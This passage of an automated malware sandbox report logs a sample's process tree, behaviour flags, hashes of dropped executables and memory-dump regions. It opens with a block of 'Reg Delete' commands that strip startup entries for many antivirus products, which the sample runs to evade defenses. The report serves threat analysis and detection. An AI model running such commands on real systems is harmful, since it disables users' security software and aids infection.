            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
            Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
            Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
            Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
          )
-
C:\Users\Admin\AppData\Local\Temp\1520.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\1520.exe
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1520.exe (depth 2)
command line: C:\Users\Admin\AppData\Local\Temp\1520.exe
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1A9F.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\1A9F.exe
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1DBD.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\1DBD.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 732
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 744
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 844
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 880
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1216 -s 872
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1F25.exe (depth 1)
command line: C:\Users\Admin\AppData\Local\Temp\1F25.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 732
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 744
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 844
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 880
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 2)
command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 872
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 1)
command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 1)
command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 1)
command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
command line: C:\Windows\SysWOW64\explorer.exe
-
C:\Windows\explorer.exe (depth 1)
command line: C:\Windows\explorer.exe
-
C:\Windows\SysWOW64\explorer.exe (depth 1)
command line: C:\Windows\SysWOW64\explorer.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\Runtimebroker.exe
MD5: 46fd8caf1c1ff128c4d121d58a2e9306
SHA1: f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256: f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA512: 6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\ProgramData\Runtimebroker.exe
MD5: 46fd8caf1c1ff128c4d121d58a2e9306
SHA1: f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256: f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA512: 6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5: c558fdaa3884f969f1ec904ae7bbd991
SHA1: b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA256: 3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA512: 6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5: 89f684ecf3d2ed9901b573992a5145c6
SHA1: d43fbd341f4e25d0b2b2a63811aba43090af3dd8
SHA256: 856be63c448e9c2283cc4e3efe469d057db1408f1c729d09d6c421d834ce08fe
SHA512: a16c1be1504869cee9e0be6093e7e0731cd27ee35514b9ce5d2a3fa77360db6f3245d0e9c29df36db4b8e118378af46e12c9e887e3d1fbf66b940cd01db591d6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5: 27872b8b0dc195f9d65a5c1fea5e2395
SHA1: b1fed06a9d9804016dd94e3ab7cc721ca5e50f56
SHA256: d0a8f7f3cca87ef0104f833db9b298e20b53b3c6fe949f23070d9daf24c0b792
SHA512: 497b8492d50a8387467dd82e7d24a03d48e745db9650cfe2bbf472bfb13dc14618206b44fa8e3c1d1c5f6cb6fde718461077c23222ccb16a6da4fd0d6532ab7b
-
C:\Users\Admin\AppData\Local\Temp\1389.exe
MD5: 46fd8caf1c1ff128c4d121d58a2e9306
SHA1: f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256: f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA512: 6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\Users\Admin\AppData\Local\Temp\1389.exe
MD5: 46fd8caf1c1ff128c4d121d58a2e9306
SHA1: f10607b0db63cf47e9fe8c01fc819e124349dc84
SHA256: f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
SHA512: 6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
-
C:\Users\Admin\AppData\Local\Temp\1520.exe
MD5: 5707ddada5b7ea6bef434cd294fa12e1
SHA1: 45bb285a597b30e100ed4b15d96a29d718697e5e
SHA256: 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA512: 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\1520.exe
MD5: 5707ddada5b7ea6bef434cd294fa12e1
SHA1: 45bb285a597b30e100ed4b15d96a29d718697e5e
SHA256: 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA512: 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\1520.exe
MD5: 5707ddada5b7ea6bef434cd294fa12e1
SHA1: 45bb285a597b30e100ed4b15d96a29d718697e5e
SHA256: 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA512: 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\1A9F.exe
MD5: 68279fe4e69442ca2124d0758006a807
SHA1: 7436d34654cee80938331ca13d90d7664e43ae94
SHA256: 9cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a
SHA512: 7bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d
-
C:\Users\Admin\AppData\Local\Temp\1A9F.exe
MD5: 68279fe4e69442ca2124d0758006a807
SHA1: 7436d34654cee80938331ca13d90d7664e43ae94
SHA256: 9cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a
SHA512: 7bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d
-
C:\Users\Admin\AppData\Local\Temp\1DBD.exe
MD5: 4fb208ec7d17d1ba04dd724693231c5e
SHA1: d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5
SHA256: 6dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449
SHA512: 172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6
-
C:\Users\Admin\AppData\Local\Temp\1DBD.exe
MD5: 4fb208ec7d17d1ba04dd724693231c5e
SHA1: d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5
SHA256: 6dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449
SHA512: 172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6
-
C:\Users\Admin\AppData\Local\Temp\1F25.exe
MD5: a14a03079bb9c9fcf9bc1877cd82b9e3
SHA1: e078ad048beeb0f0b9dc2703073a345f7c04f5f7
SHA256: ad85ec8bf87669cfc6f874e6fc4def4349ac8dabfdde8976cd90298ae24b6ce9
SHA512: 9a75763ecf168e6c25980e0c37e0bc1a91cdf41dd9f256d09f9c56b186d07dd556513b343930d704776387af8723dc5137df445c7de0e8705a6e7b0268feaee1
-
C:\Users\Admin\AppData\Local\Temp\1F25.exe
MD5: a14a03079bb9c9fcf9bc1877cd82b9e3
SHA1: e078ad048beeb0f0b9dc2703073a345f7c04f5f7
SHA256: ad85ec8bf87669cfc6f874e6fc4def4349ac8dabfdde8976cd90298ae24b6ce9
SHA512: 9a75763ecf168e6c25980e0c37e0bc1a91cdf41dd9f256d09f9c56b186d07dd556513b343930d704776387af8723dc5137df445c7de0e8705a6e7b0268feaee1
- memory/632-114-0x0000000002D60000-0x0000000002EAA000-memory.dmp (Filesize: 1.3MB)
- memory/684-162-0x0000000000000000-mapping.dmp
- memory/684-172-0x0000000000400000-0x0000000002C84000-memory.dmp (Filesize: 40.5MB)
- memory/684-170-0x0000000002C90000-0x0000000002D3E000-memory.dmp (Filesize: 696KB)
- memory/768-121-0x0000000000000000-mapping.dmp
- memory/768-212-0x0000000005180000-0x00000000051A1000-memory.dmp (Filesize: 132KB)
- memory/768-134-0x0000000004FA0000-0x0000000004FA1000-memory.dmp (Filesize: 4KB)
- memory/768-127-0x0000000005400000-0x0000000005401000-memory.dmp (Filesize: 4KB)
- memory/768-150-0x0000000004F40000-0x0000000004F41000-memory.dmp (Filesize: 4KB)
- memory/768-125-0x0000000000590000-0x0000000000591000-memory.dmp (Filesize: 4KB)
- memory/768-146-0x0000000002B60000-0x0000000002B61000-memory.dmp (Filesize: 4KB)
- memory/1216-154-0x0000000000400000-0x0000000002CB1000-memory.dmp (Filesize: 40.7MB)
- memory/1216-147-0x0000000004970000-0x0000000004A03000-memory.dmp (Filesize: 588KB)
- memory/1216-132-0x0000000000000000-mapping.dmp
- memory/1488-183-0x00000000008D0000-0x00000000008D9000-memory.dmp (Filesize: 36KB)
- memory/1488-181-0x0000000000000000-mapping.dmp
- memory/1488-182-0x00000000008E0000-0x00000000008E5000-memory.dmp (Filesize: 20KB)
- memory/1820-179-0x0000000000140000-0x0000000000144000-memory.dmp (Filesize: 16KB)
- memory/1820-177-0x0000000000000000-mapping.dmp
- memory/1820-180-0x0000000000130000-0x0000000000139000-memory.dmp (Filesize: 36KB)
- memory/2044-118-0x0000000000000000-mapping.dmp
- memory/2044-131-0x0000000000400000-0x0000000002C84000-memory.dmp (Filesize: 40.5MB)
- memory/2044-124-0x0000000002D10000-0x0000000002E5A000-memory.dmp (Filesize: 1.3MB)
- memory/2060-174-0x0000000000000000-mapping.dmp
- memory/2060-178-0x00000000003D0000-0x00000000003DC000-memory.dmp (Filesize: 48KB)
- memory/2060-176-0x00000000003E0000-0x00000000003E6000-memory.dmp (Filesize: 24KB)
- memory/2080-157-0x0000000000AF0000-0x0000000000AFC000-memory.dmp (Filesize: 48KB)
- memory/2080-156-0x0000000000B00000-0x0000000000B07000-memory.dmp (Filesize: 28KB)
- memory/2080-152-0x0000000000000000-mapping.dmp
- memory/2116-175-0x0000000000C70000-0x0000000000C79000-memory.dmp (Filesize: 36KB)
- memory/2116-173-0x0000000000C80000-0x0000000000C85000-memory.dmp (Filesize: 20KB)
- memory/2116-171-0x0000000000000000-mapping.dmp
- memory/2168-222-0x0000000000400000-0x0000000000495000-memory.dmp (Filesize: 596KB)
- memory/2168-216-0x000000000044003F-mapping.dmp
- memory/2168-215-0x0000000000400000-0x0000000000495000-memory.dmp (Filesize: 596KB)
- memory/2428-117-0x0000000000470000-0x0000000000486000-memory.dmp (Filesize: 88KB)
- memory/3188-116-0x0000000000402E1A-mapping.dmp
- memory/3188-115-0x0000000000400000-0x0000000000409000-memory.dmp (Filesize: 36KB)
- memory/3196-169-0x0000000001010000-0x000000000101F000-memory.dmp (Filesize: 60KB)
- memory/3196-168-0x0000000001020000-0x0000000001029000-memory.dmp (Filesize: 36KB)
- memory/3196-167-0x0000000000000000-mapping.dmp
- memory/3240-186-0x00000000004E0000-0x00000000004E9000-memory.dmp (Filesize: 36KB)
- memory/3240-185-0x00000000004F0000-0x00000000004F5000-memory.dmp (Filesize: 20KB)
- memory/3240-184-0x0000000000000000-mapping.dmp
- memory/3296-160-0x0000000000000000-mapping.dmp
- memory/3296-166-0x0000000000480000-0x000000000048B000-memory.dmp (Filesize: 44KB)
- memory/3296-165-0x0000000000490000-0x0000000000497000-memory.dmp (Filesize: 28KB)
- memory/3488-201-0x0000000007C90000-0x0000000007C91000-memory.dmp (Filesize: 4KB)
- memory/3488-198-0x0000000007E10000-0x0000000007E11000-memory.dmp (Filesize: 4KB)
- memory/3488-213-0x0000000009550000-0x0000000009551000-memory.dmp (Filesize: 4KB)
- memory/3488-237-0x0000000006F23000-0x0000000006F24000-memory.dmp (Filesize: 4KB)
- memory/3488-203-0x00000000086B0000-0x00000000086B1000-memory.dmp (Filesize: 4KB)
- memory/3488-199-0x0000000007E80000-0x0000000007E81000-memory.dmp (Filesize: 4KB)
- memory/3488-197-0x0000000007DA0000-0x0000000007DA1000-memory.dmp (Filesize: 4KB)
- memory/3488-187-0x0000000000000000-mapping.dmp
- memory/3488-190-0x0000000004A00000-0x0000000004A01000-memory.dmp (Filesize: 4KB)
- memory/3488-191-0x0000000007560000-0x0000000007561000-memory.dmp (Filesize: 4KB)
- memory/3488-192-0x0000000006F20000-0x0000000006F21000-memory.dmp (Filesize: 4KB)
- memory/3488-193-0x0000000006F22000-0x0000000006F23000-memory.dmp (Filesize: 4KB)
- memory/3488-217-0x0000000009270000-0x0000000009271000-memory.dmp (Filesize: 4KB)
- memory/3488-214-0x00000000087B0000-0x00000000087B1000-memory.dmp (Filesize: 4KB)
- memory/3488-196-0x0000000007CC0000-0x0000000007CC1000-memory.dmp (Filesize: 4KB)
- memory/3748-143-0x0000000000000000-mapping.dmp
- memory/3748-148-0x00000000008D0000-0x0000000000944000-memory.dmp (Filesize: 464KB)
- memory/3748-149-0x0000000000860000-0x00000000008CB000-memory.dmp (Filesize: 428KB)
- memory/3864-136-0x0000000000000000-mapping.dmp
- memory/3864-155-0x0000000002D60000-0x0000000002EAA000-memory.dmp (Filesize: 1.3MB)
- memory/3864-159-0x0000000000400000-0x0000000002CB0000-memory.dmp (Filesize: 40.7MB)
- memory/4028-194-0x0000000006D00000-0x0000000006D01000-memory.dmp (Filesize: 4KB)
- memory/4028-158-0x0000000005740000-0x0000000005741000-memory.dmp (Filesize: 4KB)
- memory/4028-195-0x0000000007400000-0x0000000007401000-memory.dmp (Filesize: 4KB)
- memory/4028-145-0x0000000005790000-0x0000000005791000-memory.dmp (Filesize: 4KB)
- memory/4028-161-0x00000000059D0000-0x00000000059D1000-memory.dmp (Filesize: 4KB)
- memory/4028-144-0x0000000005D60000-0x0000000005D61000-memory.dmp (Filesize: 4KB)
- memory/4028-151-0x00000000057F0000-0x00000000057F1000-memory.dmp (Filesize: 4KB)
- memory/4028-142-0x00000000779F0000-0x0000000077B7E000-memory.dmp (Filesize: 1.6MB)
- memory/4028-128-0x0000000000000000-mapping.dmp
- memory/4028-140-0x00000000008A0000-0x00000000008A1000-memory.dmp (Filesize: 4KB)
- memory/4028-207-0x00000000073B0000-0x00000000073B1000-memory.dmp (Filesize: 4KB)
- memory/4028-153-0x0000000005830000-0x0000000005831000-memory.dmp (Filesize: 4KB)
- memory/4136-238-0x0000000000E90000-0x0000000000E91000-memory.dmp (Filesize: 4KB)
- memory/4136-239-0x0000000000E92000-0x0000000000E93000-memory.dmp (Filesize: 4KB)
- memory/4136-245-0x00000000092B0000-0x00000000092B1000-memory.dmp (Filesize: 4KB)
- memory/4136-247-0x0000000000E93000-0x0000000000E94000-memory.dmp (Filesize: 4KB)
- memory/4136-248-0x0000000008DE0000-0x0000000008F3B000-memory.dmp (Filesize: 1.4MB)
- memory/4136-224-0x0000000000000000-mapping.dmp
- memory/4136-233-0x0000000007520000-0x0000000007521000-memory.dmp (Filesize: 4KB)
- memory/4332-503-0x0000000000000000-mapping.dmp
- memory/4364-258-0x0000000006A10000-0x0000000006A11000-memory.dmp (Filesize: 4KB)
- memory/4364-270-0x0000000008BE0000-0x0000000008C13000-memory.dmp (Filesize: 204KB)
- memory/4364-284-0x000000007E6D0000-0x000000007E6D1000-memory.dmp (Filesize: 4KB)
- memory/4364-286-0x0000000006A13000-0x0000000006A14000-memory.dmp (Filesize: 4KB)
- memory/4364-259-0x0000000006A12000-0x0000000006A13000-memory.dmp (Filesize: 4KB)
- memory/4364-249-0x0000000000000000-mapping.dmp